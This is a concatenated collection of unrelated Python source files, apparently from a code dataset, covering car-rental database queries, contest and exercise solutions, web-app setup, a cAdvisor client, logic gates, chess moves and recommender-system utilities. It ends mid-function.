and ol_street=%s and ol_zipcode=%s '''
, (location_obj.phone, location_obj.state, location_obj.city, location_obj.street,
int(location_obj.zipcode)))
return rs[0][0]
def insert_corporation(corp_obj):
run_query('''insert into zlrz_corporation (corp_name, corp_regnum) values (%s, %s)'''
, (corp_obj.corp_name, corp_obj.corp_regnum))
rs = run_query('''select * from zlrz_corporation where corp_name = %s and corp_regnum = %s'''
, (corp_obj.corp_name, corp_obj.corp_regnum))
return rs[0][0]
def insert_corporate(corporate_obj):
run_query('''insert into zlrz_corporate (cust_id, employee_id, corp_id, cust_type) values (%s, %s, %s, %s)'''
, (corporate_obj.cust_id, corporate_obj.employee_id, corporate_obj.corp_id, corporate_obj.cust_type))
rs = run_query(
'''select * from zlrz_corporate where cust_id = %s and employee_id = %s and corp_id = %s and cust_type = %s'''
, (corporate_obj.cust_id, corporate_obj.employee_id, corporate_obj.corp_id, corporate_obj.cust_type))
return rs[0][0]
def insert_individual(individual_obj):
run_query(
'''insert into zlrz_individual (cust_id, cust_driverlicnum, cust_insurcompname, cust_insurpolnum, cust_type) values (%s, %s, %s, %s, %s)'''
, (individual_obj.cust_id, individual_obj.cust_driverlicnum, individual_obj.cust_insurcompname,
individual_obj.cust_insurpolnum, individual_obj.cust_type))
rs = run_query(
'''select * from zlrz_individual where cust_id = %s and cust_driverlicnum = %s and cust_insurcompname = %s and cust_insurpolnum = %s and cust_type = %s'''
, (individual_obj.cust_id, individual_obj.cust_driverlicnum, individual_obj.cust_insurcompname,
individual_obj.cust_insurpolnum, individual_obj.cust_type))
return rs[0][0]
def insert_invoice(invoice_obj):
run_query('''insert into zlrz_invoice (inv_date, inv_amount) values (%s, %s) '''
, (invoice_obj.inv_date, invoice_obj.inv_amount))
rs = run_query('''select * from zlrz_invoice where inv_date = %s and inv_amount = %s'''
, (invoice_obj.inv_date, invoice_obj.inv_amount))
return rs[0][0]
def insert_payment(payment_obj):
run_query('''insert into zlrz_payment (pay_date, pay_method, pay_cardnum, inv_id, pay_amount)
values (%s, %s , %s , %s , %s) '''
, (payment_obj.pay_date, payment_obj.pay_method, payment_obj.pay_cardnum, payment_obj.inv_id
, payment_obj.pay_amount))
rs = run_query('''select * from zlrz_payment where pay_date=%s and pay_method=%s and pay_cardnum=%s and inv_id=%s
and pay_amount=%s'''
, (payment_obj.pay_date, payment_obj.pay_method, payment_obj.pay_cardnum, payment_obj.inv_id
, payment_obj.pay_amount))
return rs[0][0]
def insert_rental(rental_obj):
run_query('''insert into zlrz_rental (ren_pickupdate, ren_dropoffdate, ren_startodometer, ren_endodometer
, ren_dailylimit, cust_id, cust_type, veh_id, ren_pickuplocid, ren_dropoffloc_id, inv_id, cou_id)
values (%s, %s , %s , %s , %s, %s, %s, %s, %s, %s, %s, %s) '''
, (rental_obj.ren_pickupdate, rental_obj.ren_dropoffdate, rental_obj.ren_startodometer
, rental_obj.ren_endodometer, rental_obj.ren_dailylimit, rental_obj.cust_id
, rental_obj.cust_type, rental_obj.veh_id, rental_obj.ren_pickuplocid, rental_obj.ren_dropoffloc_id
, rental_obj.inv_id, rental_obj.cou_id))
rs = run_query('''select * from zlrz_rental where ren_pickupdate=%s and ren_dropoffdate=%s and ren_startodometer=%s
and ren_endodometer=%s and ren_dailylimit=%s and cust_id=%s and cust_type=%s and veh_id=%s and ren_pickuplocid=%s
and ren_dropoffloc_id=%s and inv_id=%s and cou_id=%s'''
, (rental_obj.ren_pickupdate, rental_obj.ren_dropoffdate, rental_obj.ren_startodometer
, rental_obj.ren_endodometer, rental_obj.ren_dailylimit, rental_obj.cust_id
, rental_obj.cust_type, rental_obj.veh_id, rental_obj.ren_pickuplocid,
rental_obj.ren_dropoffloc_id
, rental_obj.inv_id, rental_obj.cou_id))
return rs[0][0]
def insert_coupon(coupon_obj):
run_query('''insert into zlrz_coupons (cou_rate, validstart, validend) values (%s, %s, %s) '''
, (coupon_obj.cou_rate, coupon_obj.validstart, coupon_obj.validend))
if coupon_obj.validstart and coupon_obj.validend:
rs = run_query(
'''select * from zlrz_coupons where cou_rate = %s and validstart = %s and validend = %s order by cou_id desc'''
, (coupon_obj.cou_rate, coupon_obj.validstart, coupon_obj.validend))
else:
rs = run_query(
'''select * from zlrz_coupons where cou_rate = %s and validstart is null and validend is null order by cou_id desc'''
, (coupon_obj.cou_rate))
return rs[0][0]
def insert_cust_coupon(cust_coupon_obj):
run_query('''insert into zlrz_cust_coupon (cou_id, cust_id, cust_type, coupon_type) values (%s, %s, %s, %s) '''
,
(cust_coupon_obj.cou_id, cust_coupon_obj.cust_id, cust_coupon_obj.cust_type, cust_coupon_obj.coupon_type))
return
def get_password(username):
rs = run_query('''select password from zlrz_customer where username = %s''', (username,))
return rs[0][0] if rs is not None else rs
def get_user_type(username):
rs = run_query('''select cust_type from zlrz_customer where username = %s''', (username,))
return rs[0][0] if rs is not None else rs
def get_user_id(username):
rs = run_query('''select cust_id from zlrz_customer where username = %s''', (username,))
return rs[0][0] if rs is not None else rs
def get_all_corporations():
rs = run_query('''select * from zlrz_corporation''')
return [] if rs is None else list(map(lambda t: Corporation(t[1], t[2], t[0]), rs))
def get_cust_coupon(cust_id):
rs = run_query('''select zlrz_coupons.* from zlrz_cust_coupon join zlrz_coupons
on zlrz_cust_coupon.cou_id = zlrz_coupons.cou_id where zlrz_cust_coupon.cust_id = %s''', (cust_id))
return [] if rs is None else list(map(lambda t: Coupon(t[1], t[2], t[3], t[0]), rs))
def get_coupon(cust_id):
rs = run_query('''select zlrz_coupons.* from zlrz_cust_coupon join zlrz_coupons
on zlrz_cust_coupon.cou_id = zlrz_coupons.cou_id where zlrz_cust_coupon.cust_id = %s'''
, (cust_id,))
res = None
maxrate = float('-inf')
if rs is not None:
coupons = list(map(lambda t: Coupon(t[1], t[2], t[3], t[0]), rs))
for cou in coupons:
if cou.validstart and cou.validend:
if (datetime.now() - cou.validstart).days >= 0 and (cou.validend - datetime.now()).days >= 0:
if cou.cou_rate > maxrate:
maxrate = cou.cou_rate
res = cou
if not cou.validstart and not cou.validend:
if cou.cou_rate > maxrate:
maxrate = cou.cou_rate
res = cou
return res
def get_vehicles():
"""
Get full location
:return:
"""
rs = run_query('''select * from zlrz_vehicle''')
return [] if rs is None else rs
def get_all_customers():
rs = run_query('''select * from zlrz_customer''')
return [] if rs is None else list(map(lambda t: Customer(t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[8], t[0]), rs))
def get_all_corporate():
rs = run_query('''select * from zlrz_corporate''')
return [] if rs is None else list(map(lambda t: Corporate(t[0], t[1], t[2], t[3]), rs))
def get_all_individual():
rs = run_query('''select * from zlrz_individual''')
return [] if rs is None else list(map(lambda t: Corporate(t[0], t[1], t[2], t[3], t[4]), rs))
def get_all_vehicles():
rs = run_query('''select * from zlrz_vehicle''')
return [] if rs is None else list(map(lambda t: Vehicle(t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[0]), rs))
def get_all_locations():
"""
Get all location objects
:return:
"""
rs = run_query('''select * from zlrz_office_location''')
return [] if rs is None else list(map(lambda t: Location(t[1], t[2], t[3], t[4], t[5], t[0]), rs))
def get_location_by_id(location_id):
"""
Get all location objects
:return:
"""
rs = run_query('''select * from zlrz_office_location where ol_id = %s''', (location_id,))
return list(map(lambda t: Location(t[1], t[2], t[3], t[4], t[5], t[0]), rs))[0] if rs is not None else None
def get_all_vehclasses():
"""
Get all vehicleclass objects
:return:
"""
rs = run_query('''select * from zlrz_vehicle_class''')
return [] if rs is None else list(map(lambda t: VehicleClass(t[1], t[2], t[3], t[0]), rs))
def get_vehicle_by_id(vehicle_id):
rs = run_query('''select * from zlrz_vehicle where veh_id=%s''', (int(vehicle_id),))
return list(map(lambda t: Vehicle(t[1], t[2], t[3], t[4], t[5], t[6], t[7], t[0]), rs))[0] \
if rs is not None else None
def get_vehicle_class(vehicle_id):
rs = run_query('''select zlrz_vehicle_class.* from zlrz_vehicle join zlrz_vehicle_class
on zlrz_vehicle.vc_num = zlrz_vehicle_class.vc_num where zlrz_vehicle.veh_id=%s''', (int(vehicle_id),))
return list(map(lambda t: VehicleClass(t[1], t[2], t[3], t[0]), rs))[0] if rs is not None else None
def delete_veh_class(vc_num):
if vc_num == '':
return
res = run_query('''select * from zlrz_vehicle where vc_num=%s''', (int(vc_num)))
if res:
return 1
else:
rs = run_query('''delete from zlrz_vehicle_class where vc_num=%s''', (int(vc_num)))
return rs
def delete_off_loc(location_id):
if location_id == '':
return
res = run_query('''select * from zlrz_office_location where ol_id=%s''', (int(location_id)))
if res:
return 1
else:
rs = run_query('''delete from zlrz_office_location where ol_id=%s''', (int(location_id)))
return rs
def delete_vehicle(veh_id):
if veh_id == '':
return
rs = run_query('''delete from zlrz_vehicle where veh_id=%s''', (int(veh_id)))
return rs
def delete_customer(cust_id):
if cust_id == '':
return
rs5 = run_query('''delete from zlrz_rental where cust_id=%s''', (int(cust_id)))
rs4 = run_query('''delete from zlrz_cust_coupon where cust_id=%s''', (int(cust_id)))
rs2 = run_query('''delete from zlrz_corporate where cust_id=%s''', (int(cust_id)))
rs3 = run_query('''delete from zlrz_individual where cust_id=%s''', (int(cust_id)))
rs1 = run_query('''delete from zlrz_customer where cust_id=%s''', (int(cust_id)))
return rs1
def delete_cust_coupon(cou_id):
if cou_id == '':
return
rs1 = run_query('''delete from zlrz_cust_coupon where cou_id=%s''', (int(cou_id)))
rs2 = run_query('''delete from zlrz_coupons where cou_id=%s''', (int(cou_id)))
return rs1
def delete_corporation(corp_id):
if corp_id == '':
return
res = run_query('''select * from zlrz_corporation where corp_id=%s''', (int(corp_id)))
if res:
return 1
else:
rs = run_query('''delete from zlrz_corporation where corp_id=%s''', (int(corp_id)))
return rs
def update_vehicle_class(class_obj):
rs = run_query('''update zlrz_vehicle_class set vc_rateperday = %s, vc_feeovermile = %s where vc_name = %s''', (int(class_obj.vc_rateperday), int(class_obj.vc_feeovermile), class_obj.vc_name))
return rs |
7,661 | 1803f634c8e833f4a92ae35bcfafb04dfd1d2305 | #!/usr/bin/env python
import sys
def solve(n, k):
wrap = 2 ** n
snaps_that_matter = k % wrap
return snaps_that_matter == wrap - 1
def main():
lines = sys.stdin.readlines()
T = int(lines[0])
for i, line in enumerate(lines[1:]):
N, K = line.split(' ')
on = solve(int(N), int(K))
str_on = 'OFF'
if on:
str_on = 'ON'
print 'Case #%d: %s' % (i+1, str_on)
if __name__ == '__main__': main()
|
7,662 | 299b437c007d78c3d9a53205de96f04d2c6118e0 | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 11 07:41:34 2017
@author: Gabriel
"""
months = 12
balance = 4773
annualInterestRate = 0.2
monthlyPaymentRate = 434.9
monthlyInterestRate = annualInterestRate / 12
while months > 0:
minimumMonPayment = monthlyPaymentRate * balance
monthlyUnpaidBalan = balance - monthlyPaymentRate
# Result of the balance
balance = monthlyUnpaidBalan + (monthlyInterestRate * monthlyUnpaidBalan)
months -= 1
print('Remaining balance:', format(balance, '.2f'))
|
7,663 | 632c690261b31c7ac0e1d90c814e3b9a7a0dcb29 | #
# @lc app=leetcode.cn id=784 lang=python3
#
# [784] 字母大小写全排列
#
# @lc code=start
# 回溯法 --> 通过 64 ms 13.5 MB
class Solution:
def __init__(self):
self.result = []
def letterCasePermutation(self, S: str) -> List[str]:
arr = list(S)
self.backtracing(arr, 0)
return self.result
def backtracing(self, arr, start):
if start == len(arr):
self.result.append(''.join(arr))
return
# 把自身递归
self.backtracing(arr, start+1)
# 若是字母,则切换大小写后递归
if arr[start].isalpha():
arr[start] = arr[start].lower() if arr[start].isupper() else arr[start].upper()
self.backtracing(arr, start+1)
# @lc code=end
|
7,664 | 214585956e44ce006db0702fd23692b11459f9e1 | from five import grok
from zope.formlib import form
from zope import schema
from zope.interface import implements
from zope.component import getMultiAdapter
from plone.app.portlets.portlets import base
from plone.memoize.instance import memoize
from plone.portlets.interfaces import IPortletDataProvider
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from Products.CMFCore.utils import getToolByName
#grok.templatedir('templates')
class IContentNavigation(IPortletDataProvider):
portlet_header = schema.TextLine(
title = u"Portlet Header",
default = u"TWITTER FEED",
required = False
)
twitter_username = schema.TextLine(
title = u"Twitter Username",
default = u"isclimatechange"
)
twitter_widgetId = schema.TextLine(
title = u"Twitter Widget ID",
default = u"565570873433006080"
)
class Assignment(base.Assignment):
implements(IContentNavigation)
def __init__(self,portlet_header=None, twitter_username= None, twitter_widgetId=None):
self.portlet_header = portlet_header
self.twitter_username = twitter_username
self.twitter_widgetId = twitter_widgetId
@property
def title(self):
return self.portlet_header
class Renderer(base.Renderer):
render = ViewPageTemplateFile('twitterportlet.pt')
def __init__(self, context, request, view, manager, data):
self.context = context
self.request = request
self.view = view
self.manager = manager
self.data = data
def contents(self):
return self.data
class AddForm(base.AddForm):
form_fields = form.Fields(IContentNavigation)
label = u"Add Twitter Portlet"
description = ''
def create(self, data):
assignment = Assignment()
form.applyChanges(assignment, self.form_fields, data)
return assignment
class EditForm(base.EditForm):
form_fields = form.Fields(IContentNavigation)
label = u"Edit Twitter Portlet"
description = ''
|
7,665 | bd726c86bdecd0b63eb48d056932706d3ecf147d | import os,sys
import logging
from flask import Flask
from flask_bootstrap import Bootstrap
from flask_sqlalchemy import SQLAlchemy
def create_app():
app = Flask(__name__)
Bootstrap(app)
return app
logging.basicConfig(level=logging.DEBUG)
app = create_app()
app.config['WTF_CSRF_ENABLED'] = True
app.config['SECRET_KEY'] = 'you-will-never-guess'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))),'db','micro_scrabble.db')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
db = SQLAlchemy(app)
#app.config.from_object('flask_config')
from . import views
|
7,666 | a1141e6aae6992a5037d53093378f0d346f2ca29 | #!/usr/bin/env python
from pathlib import Path
import os
from setuptools import setup, find_packages
install_requires = [
"numpy",
"tensorflow-hub==0.4.0",
"bert-tensorflow==1.0.1",
"click"
]
# Hacky check for whether CUDA is installed
has_cuda = any("CUDA" in name.split("_") for name in os.environ.keys())
install_requires.append("tensorflow-gpu==1.13.1" if has_cuda else "tensorflow==1.13.1")
version_file = Path(__file__).parent.joinpath("easybert", "VERSION.txt")
version = version_file.read_text(encoding="UTF-8").strip()
setup(
name="easybert",
version=version,
url="https://github.com/robrua/easy-bert",
author="Rob Rua",
author_email="robertrua@gmail.com",
description="A Dead Simple BERT API (https://github.com/google-research/bert)",
keywords=["BERT", "Natural Language Processing", "NLP", "Language Model", "Language Models", "Machine Learning", "ML", "TensorFlow", "Embeddings", "Word Embeddings", "Sentence Embeddings"],
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3"
],
license="MIT",
packages=find_packages(),
entry_points={"console_scripts": ["bert=easybert.__main__:_main"]},
zip_safe=True,
install_requires=install_requires,
include_package_data=True
)
|
7,667 | 87f672919f6019e549508b239c798301d5f549bd | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2015-2016 Applatix, Inc. All rights reserved.
#
'''
cAdvisor CLI. Used by axstats temporarily before moving to Heapster
'''
import requests
import logging
import time
logger = logging.getLogger(__name__)
CHECK_LIVELINESS_INTERVAL = 5
CONNECTION_TIMEOUT = 5
class AXCadvisorClient(object):
def __init__(self, ip):
self._wait_interval = 60
# Using Kubernetes default cadvisor port
self._url_prefix = "http://{ip}:{port}/api/v2.0/".format(ip=ip, port=4194)
self.wait_for_cadvisor_up()
def wait_for_cadvisor_up(self):
"""
Poll cadvisor endpoint till there is a response.
Note it was calling /api/v2.0/version before, but this api in Kubernetes returns empty string
:param url:
:return:
"""
ping = None
while ping is None:
ping = requests.get(self._url_prefix, timeout=CONNECTION_TIMEOUT)
if ping is None:
logger.debug("Unable to connect to cadvisor %s. Will sleep for %s sec",
self._url_prefix, CHECK_LIVELINESS_INTERVAL)
time.sleep(CHECK_LIVELINESS_INTERVAL)
logger.info("cAdvisor client is up for endpoint %s", self._url_prefix)
def get_machine_info(self):
url = self._url_prefix + "machine"
return self._get_response(url)
def get_spec_info(self):
url = self._url_prefix + "spec"
data = {
"recursive": "true"
}
return self._get_response(url, data)
def get_events(self, event_start):
url = self._url_prefix + "events"
data = {
"all_events": "true",
"subcontainers": "true",
"start_time": event_start
}
return self._get_response(url, data)
def get_docker_stats(self):
url = self._url_prefix + "stats"
data = {
"recursive": "true",
"count": str(self._wait_interval)
}
return self._get_response(url, data)
@staticmethod
def _get_response(url, params=None):
out = None
try:
response = requests.get(url=url, params=params, timeout=CONNECTION_TIMEOUT)
if response.status_code == requests.codes.ok:
out = response.json()
except requests.exceptions.RequestException as e:
logger.error('Unexpected exception occurred during request: %s', e)
return out
|
7,668 | 68e1e39f193537367d899c5fd01c1361ed93ef29 | n, k = raw_input().split()
n = int(n)
k = int(k)
div = 0
for i in range(n):
new = int(raw_input())
if (new % k) == 0:
div += 1
print div |
7,669 | 7ee3301b55d323d156bd394f8525e37502d19430 | number = int(input())
bonus = 0
if number <= 100:
bonus = 5
total_point = number + bonus
elif number > 1000:
bonus = 0.1 * number
total_point = number + bonus
else:
bonus = 0.2 * number
total_point = number + bonus
if number % 2 == 0:
bonus = bonus + 1
total_point = number + bonus
print(bonus)
print(total_point)
elif number % 10 == 5:
bonus = bonus + 2
total_point = number + bonus
print(bonus)
print(total_point) |
7,670 | c6fa8c33630fc2f7ffb08aace1a260e6805ddfa2 | """Main application for FastAPI"""
from typing import Dict
from fastapi import FastAPI
from fastapi.openapi.utils import get_openapi
from cool_seq_tool.routers import default, mane, mappings, SERVICE_NAME
from cool_seq_tool.version import __version__
app = FastAPI(
docs_url=f"/{SERVICE_NAME}",
openapi_url=f"/{SERVICE_NAME}/openapi.json",
swagger_ui_parameters={"tryItOutEnabled": True}
)
app.include_router(default.router)
app.include_router(mane.router)
app.include_router(mappings.router)
def custom_openapi() -> Dict:
"""Generate custom fields for OpenAPI response."""
if app.openapi_schema:
return app.openapi_schema
openapi_schema = get_openapi(
title="The GenomicMedLab Cool Seq Tool",
version=__version__,
description="Common Operations On Lots-of Sequences Tool.",
routes=app.routes
)
openapi_schema["info"]["contact"] = {
"name": "Alex H. Wagner",
"email": "Alex.Wagner@nationwidechildrens.org",
"url": "https://www.nationwidechildrens.org/specialties/institute-for-genomic-medicine/research-labs/wagner-lab" # noqa: E501
}
app.openapi_schema = openapi_schema
return app.openapi_schema
app.openapi = custom_openapi
|
7,671 | 66f6639ae62fe8c0b42171cf3e3fb450d8eee2b2 | from pypc.a_primitives.nand import nand
# nand gates used: 5
def half_adder(a: bool, b: bool) -> (bool, bool):
"""Returns a + b in the form of a tuple of two bools representing the two
bits."""
nand_a_b = nand(a, b)
nand_c = nand(nand_a_b, a)
nand_d = nand(nand_a_b, b)
high = nand(nand_a_b, nand_a_b)
low = nand(nand_c, nand_d)
return high, low
# nand gates used: 9
def full_adder(a: bool, b: bool, c: bool) -> (bool, bool):
"""Returns a + b + c in the form of a tuple of two bools representing the two
bits.
Carried value is ignored.
"""
nand_a_b = nand(a, b)
nand_c = nand(nand_a_b, a)
nand_d = nand(nand_a_b, b)
low_a_b = nand(nand_c, nand_d)
nand_low_a_b_c = nand(low_a_b, c)
nand_e = nand(low_a_b, nand_low_a_b_c)
nand_f = nand(nand_low_a_b_c, c)
high = nand(nand_a_b, nand_low_a_b_c)
low = nand(nand_e, nand_f)
return high, low
|
7,672 | 90c9456bf22745d99fa76dbc752beae1a3835682 | from field import print_field
from math_utilite import sign, col
def start_parameter_2(par):
global cell_king, castling_control, trans, take_on_aisle
cell_king = par[0]
castling_control = par[1]
trans = par[2]
take_on_aisle = par[3]
def det_cell_king(field):
global cell_king
cell_king = {sign(fig):(x, y) for x, row in enumerate(field) for y, fig in enumerate(row) if abs(fig)==6}
return cell_king
def det_castling_control(field):
global castling_control
for color in (1, -1):
hor = 0 if color == 1 else 7
dk = 0 if field[hor][4] == 6*color else 1
dlr = 0 if field[hor][0] == 2*color else 1
drr = 0 if field[hor][-1] == 2*color else 1
castling_control[color] = (dk, dlr, drr)
return castling_control
def king_and_castling(field, color, old, new, d):
global cell_king, castling_control
cell_king[color] = (new[0], new[1])
storlg=new[1]-old[1]
if abs(storlg) == 2:
storlg = sign(storlg)
rp = 7 if storlg*d == 1 else 0
field[new[0]][new[1]-storlg] = 2*color if d == 1 else 0
field[new[0]][rp] = 0 if d == 1 else 2*color
cont = castling_control[color]
castling_control[color] = (cont[0], cont[1]-storlg+d, cont[2]+storlg+d)
castling_control[color] = (castling_control[color][0]+d, castling_control[color][1], castling_control[color][2])
def rook(field, color, old, new, d):
global castling_control
hor = 0 if color == 1 else 7
cont = castling_control[color]
x, y = old if d == 1 else new
if x == hor and y % 7 == 0:
castling_control[color] = (cont[0], cont[1] + d*(-sign(y-3)+1), cont[2] + d*(sign(y-3)+1))
def trans_pawn(color, old):
return True if (old[0] * color) % 7 == 6 else False
def take_on_aisle_pawn(color, old, new):
global take_on_aisle
if abs(new[0]-old[0]) == 2:
take_on_aisle = (color, new[1])
else:
take_on_aisle = ('l', 8)
return take_on_aisle
def take_on_aisle_move(field, color, old, new, fig, d, main):
global take_on_aisle
if main == 1:
take_on_aisle_pawn(color, old, new)
if abs(old[1]-new[1]) == 1:
if field[new[0]][new[1]] == 0 and d == 1:
field[old[0]][new[1]] = 0
if fig == 0 and d == -1:
field[new[0]][old[1]] = -color
def move(field, old, new, fig=0, d=1, trans_fig=1, main=0):
global trans, take_on_aisle
color = sign(field[old[0]][old[1]])
figure = abs(field[old[0]][old[1]])
if figure == 2:
rook(field, color, old, new, d)
if figure == 6:
king_and_castling(field, color, old, new, d)
if trans == True:
figure = 1
trans = False
if figure == 1:
trans = trans_pawn(color, old) if d == 1 else False
if trans == True:
figure = trans_fig
take_on_aisle_move(field, color, old, new, fig, d, main)
if main == 1:
trans = False
field[new[0]][new[1]] = color*figure
field[old[0]][old[1]] = fig
|
7,673 | 52872804a069cd954bea247b64041eceafd8d139 | __author__ = 'Administrator'
#coding:utf-8
def calculate_score(calculation_params):
"""
计算选手在一跳中的得分,共7名裁判,去掉两个最高分和两个最低分,余下3名裁判员的分数之和乘以运动员所跳动作的难度系数,便得出该动作的实得分
传入参数为字典
calculation_params["score_list"] = []
calculation_params["difficulty"] = float
"""
score_list = calculation_params["score_list"]
difficulty = calculation_params["difficulty"]
score_list.sort()
temp_sum = 0.0
res = {}
res['expression'] = '('
for i in score_list[2:5]:
temp_sum += i
res['expression'] += "%.1f + " % i
res['final_score'] = temp_sum * difficulty
res['expression'] = res['expression'][:-3]
res['expression'] += ') * %.1f = %.1f' % (difficulty, res['final_score'])
return res
if __name__ == "__main__":
calculation_params = {
"score_list" : [1.0, 5.0, 3.0, 2.0, 9.0, 10.0, 2.0],
"difficulty" : 3.6,
}
print calculate_score(calculation_params) |
7,674 | 4958d6d88b762e6fbe860123b7274c16b6452605 | import sqlalchemy
from .base import Base
from sqlalchemy import Column, Integer, String, ForeignKey
from sqlalchemy.dialects.postgresql import UUID
from sqlalchemy.orm import relationship
class ModelSpellVariantPair(Base):
__tablename__ = "spell_variant_pair"
uuid = Column(
UUID(as_uuid=True),
server_default=sqlalchemy.text("uuid_generate_v4()"),
unique=True,
nullable=False,
primary_key=True,
)
class_id = Column(
UUID(as_uuid=True), ForeignKey("class.uuid", ondelete="CASCADE"), nullable=False
)
spells = relationship(
"ModelSpell", backref="spell_variant_pair", cascade="all, delete-orphan"
)
|
7,675 | af1eab58fd641b14ac054fa26e28d52c9741fb16 | import copy
import os
from datetime import datetime
import numpy as np
from sklearn.neighbors import NearestNeighbors
from sklearn.preprocessing import normalize
ROOT_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../')
DATA_FILE = os.path.join(ROOT_DIR, 'data/data_train.csv')
TRAINING_FILE_NAME = os.path.join(
ROOT_DIR, 'data/trainingIndices.csv')
VALIDATION_FILE_NAME = os.path.join(
ROOT_DIR, 'data/validationIndices.csv')
VALIDATION_MASK_FILE_NAME = os.path.join(
ROOT_DIR, 'data/train_valid_80_10_10/validationIndices_mask.csv')
AUX = os.path.join(
ROOT_DIR, 'data/train_valid_80_10_10/validationIndices_first.csv')
META_VALIDATION_FILE_NAME = os.path.join(
ROOT_DIR, 'data/train_valid_80_10_10/validationIndices_second.csv')
SAMPLE_SUBMISSION = os.path.join(ROOT_DIR, \
'data/sampleSubmission.csv')
ENSEMBLE_INPUT_DIR = 'data/stacking/good_data'
ITEM_COUNT = 1000
USER_COUNT = 10000
WEIGHT_KNN = 0.001
N_NEIGHBORS = 3
USER_COUNT_WEIGHT = 10
SAVE_META_PREDICTIONS = False
def load_ratings(data_file=DATA_FILE):
ratings = []
with open(data_file, 'r') as file:
# Read header.
_ = file.readline()
for line in file:
key, value_string = line.split(",")
rating = float(value_string)
row_string, col_string = key.split("_")
row = int(row_string[1:])
col = int(col_string[1:])
ratings.append((row - 1, col - 1, rating))
return ratings
def ratings_to_matrix(ratings):
matrix_rows = USER_COUNT
matrix_cols = ITEM_COUNT
matrix = np.zeros([matrix_rows, matrix_cols])
for row, col, rating in ratings:
matrix[row, col] = rating
return matrix
def mask_validation(data, use_three_way):
masked_data = np.copy(data)
if use_three_way:
mask_file = VALIDATION_MASK_FILE_NAME
else:
mask_file = VALIDATION_FILE_NAME
mask_indices = get_indices_from_file(mask_file)
for row_index, col_index in mask_indices:
masked_data[row_index][col_index] = 0
return masked_data
def get_validation_indices(use_three_way):
if use_three_way:
validation_indices = get_indices_from_file(AUX)
else:
validation_indices = get_indices_from_file(VALIDATION_FILE_NAME)
return validation_indices
def get_meta_validation_indices():
return get_indices_from_file(META_VALIDATION_FILE_NAME)
def get_observed_indices(data):
row_indices, col_indices = np.where(data != 0)
return list(zip(row_indices, col_indices))
def get_unobserved_indices(data):
row_indices, col_indices = np.where(data == 0)
return list(zip(row_indices, col_indices))
def get_indices_from_file(file_name):
indices = []
with open(file_name, 'r') as file:
# Read header.
_ = file.readline()
for line in file:
i, j = line.split(",")
indices.append((int(i), int(j)))
return indices
def get_indices_to_predict():
"""Get list of indices to predict from sample submission file.
Returns:
indices_to_predict: list of tuples with indices"""
indices_to_predict = []
with open(SAMPLE_SUBMISSION, 'r') as file:
_ = file.readline()
for line in file:
key, _ = line.split(",")
row_string, col_string = key.split("_")
i = int(row_string[1:]) - 1
j = int(col_string[1:]) - 1
indices_to_predict.append((i, j))
return indices_to_predict
def write_ratings(predictions, submission_file):
with open(submission_file, 'w') as file:
file.write('Id,Prediction\n')
for i, j, prediction in predictions:
file.write('r%d_c%d,%f\n' % (i, j, prediction))
def reconstruction_to_predictions(
reconstruction, submission_file, indices_to_predict=None):
if indices_to_predict is None:
indices_to_predict = get_indices_to_predict()
enumerate_predictions = lambda t: (
t[0] + 1, t[1] + 1, reconstruction[t[0], t[1]])
predictions = list(map(enumerate_predictions, indices_to_predict))
write_ratings(predictions, submission_file)
def save_ensembling_predictions(reconstruction, name):
reconstruction_to_predictions(
reconstruction, ROOT_DIR + 'data/meta_training_' + name + '_stacking'
+ datetime.now().strftime('%Y-%b-%d-%H-%M-%S') + '.csv',
indices_to_predict=get_validation_indices(use_three_way=True))
reconstruction_to_predictions(
reconstruction, ROOT_DIR + 'data/meta_validation_' + name + '_stacking'
+ datetime.now().strftime('%Y-%b-%d-%H-%M-%S') + '.csv',
indices_to_predict=get_meta_validation_indices())
def clip(data):
data[data > 5] = 5
data[data < 1] = 1
return data
def ampute_reconstruction(reconstruction, data):
observed_indices = get_observed_indices(data)
for row_index, col_index in observed_indices:
reconstruction[row_index][col_index] = data[row_index][col_index]
def impute_by_avg(data, by_row):
data = data.T if by_row else data
for row in data:
empty = (row == 0)
row_sum = np.sum(row)
row[empty] = row_sum / np.count_nonzero(row)
return data.T if by_row else data
def impute_by_bias(data):
total_average = np.mean(data[np.nonzero(data)])
row_biases = np.zeros(data.shape[0])
col_biases = np.zeros(data.shape[1])
for row_index in range(data.shape[0]):
row_biases[row_index] = np.sum(data[row_index]) / \
np.count_nonzero(data[row_index]) - total_average
for col_index in range(data.shape[1]):
col_biases[col_index] = np.sum(data[:][col_index]) / \
np.count_nonzero(data[:][col_index]) - total_average
for row_index in range(data.shape[0]):
for col_index in range(data.shape[1]):
if data[row_index, col_index] == 0:
new_value = total_average + \
row_biases[row_index] + col_biases[col_index]
data[row_index, col_index] = new_value
return data
def impute_by_variance(data):
global_average = np.sum(data) / np.count_nonzero(data)
global_variance = np.var(data[data != 0])
adjusted_movie_means = np.zeros((data.shape[1],))
for i in range(data.shape[1]):
movie_ratings = data[:, i]
movie_ratings = movie_ratings[movie_ratings != 0]
movie_variance = np.var(movie_ratings)
relative_variance = movie_variance / global_variance
adjusted_movie_means[i] = (
global_average * relative_variance + np.sum(movie_ratings)) / (
relative_variance + np.count_nonzero(movie_ratings))
adjusted_user_deviation = np.zeros((data.shape[0],))
for i in range(data.shape[0]):
user_ratings = data[i]
user_deviations = adjusted_movie_means - user_ratings
user_deviations = user_deviations[user_ratings != 0]
user_deviation_variance = np.var(user_deviations)
relative_variance = user_deviation_variance / global_variance
adjusted_user_deviation[i] = (
global_average * relative_variance + sum(user_deviations)) / (
relative_variance + np.count_nonzero(user_deviations))
user_counts = np.count_nonzero(data, axis=1)
movie_counts = np.count_nonzero(data, axis=0)
movie_count_matrix = np.tile(movie_counts, (len(user_counts), 1))
user_count_matrix = np.tile(user_counts, (len(movie_counts), 1)).T
combined_matrix = copy.copy(
movie_count_matrix) + USER_COUNT_WEIGHT * copy.copy(user_count_matrix)
d_matrix = np.divide(movie_count_matrix, combined_matrix)
m_matrix = np.tile(
